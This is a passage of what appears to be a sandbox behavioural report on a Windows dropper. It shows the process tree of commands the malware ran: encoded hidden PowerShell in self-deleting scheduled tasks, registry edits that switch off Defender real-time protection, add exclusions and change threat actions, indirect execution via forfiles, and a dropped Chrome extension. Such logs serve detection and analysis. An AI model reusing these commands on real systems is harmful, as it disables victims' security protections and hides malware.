                                                                                                                                schtasks /CREATE /TN "gBPposrbU" /SC once /ST 05:45:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                3⤵
                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                PID:796
                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                schtasks /run /I /tn "gBPposrbU"
                                                                                                                                3⤵
                                                                                                                                  PID:3300
                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                  schtasks /DELETE /F /TN "gBPposrbU"
                                                                                                                                  3⤵
                                                                                                                                    PID:2452
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                    3⤵
                                                                                                                                      PID:3736
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                        4⤵
                                                                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:980
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                      3⤵
                                                                                                                                        PID:932
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                          4⤵
                                                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                                                          PID:912
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /CREATE /TN "gUJaJxlOv" /SC once /ST 14:18:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                        3⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                        PID:796
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /run /I /tn "gUJaJxlOv"
                                                                                                                                        3⤵
                                                                                                                                          PID:1084
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /DELETE /F /TN "gUJaJxlOv"
                                                                                                                                          3⤵
                                                                                                                                            PID:1928
                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                                                            3⤵
                                                                                                                                            • Indirect Command Execution
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:1144
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                              4⤵
                                                                                                                                                PID:3748
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                  5⤵
                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  PID:3276
                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                    6⤵
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:2568
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:2988
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  4⤵
                                                                                                                                                  • Windows security bypass
                                                                                                                                                  PID:876
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:2796
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                    4⤵
                                                                                                                                                    • Windows security bypass
                                                                                                                                                    PID:3428
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2308
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                      4⤵
                                                                                                                                                        PID:2940
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:2356
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                            PID:536
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /C copy nul "C:\Windows\Temp\HIoTiJfsoGzpkHVf\KkmNinuP\BBDhWPGSFRikhlIk.wsf"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:1236
                                                                                                                                                          • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                            wscript "C:\Windows\Temp\HIoTiJfsoGzpkHVf\KkmNinuP\BBDhWPGSFRikhlIk.wsf"
                                                                                                                                                            3⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:2280
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2672
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              PID:1604
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:1932
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              PID:2244
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              PID:3932
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:3740
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:3972
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:3840
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:1656
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:1956
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              PID:1740
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:3380
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:3416
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              PID:1088
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2076
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              PID:2648
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2700
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                              4⤵
                                                                                                                                                              • Windows security bypass
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:3432
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2552
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:3700
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:2800
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                    4⤵
                                                                                                                                                                      PID:2684
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                      4⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:3584
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:3988
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:2040
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          4⤵
                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                          PID:912
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:2672
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:1084
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:1384
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                4⤵
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                PID:2748
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                4⤵
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                PID:1604
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                4⤵
                                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                                PID:2532
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:2372
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:3980
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:3792
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3768
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /CREATE /TN "gcbLDZSmt" /SC once /ST 20:34:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                      PID:2456
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /run /I /tn "gcbLDZSmt"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:3556
                                                                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                      schtasks /DELETE /F /TN "gcbLDZSmt"
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:1984
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:3364
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:4064
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:4000
                                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                            REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                            4⤵
                                                                                                                                                                                              PID:3996
                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 01:44:08 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\GbaBHZi.exe\" 9Z /ApMSdidEj 385121 /S" /V1 /F
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                            PID:1896
                                                                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                            schtasks /run /I /tn "unWjgiOqmrJvCJdsa"
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:2404
                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 576
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                              • Program crash
                                                                                                                                                                                              PID:3924
                                                                                                                                                                                          • C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\GbaBHZi.exe
                                                                                                                                                                                            C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\GbaBHZi.exe 9Z /ApMSdidEj 385121 /S
                                                                                                                                                                                            2⤵
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Drops Chrome extension
                                                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                                                            PID:3792
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:3968
                                                                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                                                  PID:2916
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                                    PID:2456
                                                                                                                                                                                                    • \??\c:\windows\SysWOW64\reg.exe
